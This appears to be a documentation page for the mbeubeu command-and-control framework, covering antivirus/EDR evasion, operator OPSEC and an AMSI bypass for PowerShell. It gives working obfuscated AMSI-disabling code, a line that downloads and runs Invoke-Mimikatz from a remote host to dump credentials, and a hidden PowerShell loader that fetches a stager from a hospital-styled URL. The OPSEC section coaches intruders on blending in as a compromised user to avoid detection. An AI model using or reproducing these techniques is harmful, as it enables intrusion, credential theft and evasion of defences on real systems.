Note on AV/EDR Evasion

The mbeubeu project does not claim to provide 100% undetectable payloads against all antivirus (AV) and endpoint detection and response (EDR) solutions. Similar to other C2 frameworks, mbeubeu is designed with interoperability in mind offering the flexibility to integrate with external tools and techniques focused on AV/EDR evasion.

For instance:

Ultimately, evasion is the operator's responsibility. mbeubeu provides the base payloads, but it's up to the operator to ensure their payloads are stealthy and appropriate for the target environment. AV/EDR evasion requires ongoing adaptation and creativity no framework alone can guarantee stealth.


OPSEC

Perfect OPSEC does not exist. A whoami at the wrong time is a beacon. Every action during an operation has a detection risk it’s just a matter of how loud it is, when you do it, and how you cover your tracks.

Even a simple whoami can trigger alerts in hardened environments if it's executed by a non-allowlisted process or at odd hours. Once you compromise a user, your access becomes your disguise. Your commands must reflect the role of the compromised user.
When someone outside IT runs ipconfig, the hunt starts. 👀


The AMSI bypass technique used in tools like `pwsploit` and `pwsh-execute` is simple yet powerful.

Traditional bypasses using Matt Graeber’s method (e.g., [Ref].Assembly.GetType(...)) are often detected by AMSI if executed on a single line.

However, by splitting the bypass into multiple lines and executing each line in the **same** PowerShell process, AMSI scanning is delayed until after the bypass takes effect.

== PoC ==

opsec AMSI bypass PoC


== Real-World Example ==

Suppose your stager is hosted at: https://us.hospital.org/patients

Your remote script could include:

$a = [Ref].Assembly.GetType('Sys'+'tem.Manag'+'ement.Au'+'tomation.Am'+'siUtils')
$b = $a.GetField('ams'+'iInitF'+'ailed','NonP'+'ublic,St'+'atic')
$b.SetValue($null,$true)
iex (New-Object Net.WebClient).DownloadString('http://example.com/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command "privilege::debug"
    
Then load it line-by-line using:
$file = (New-Object System.Net.WebClient).DownloadString('https://us.hospital.org/patients')
foreach ($line in $file) {
    $line | powershell -nop -w hidden
}
    
This delays AMSI enough to slip through.

OPSEC Considerations




Next: Development / FaaS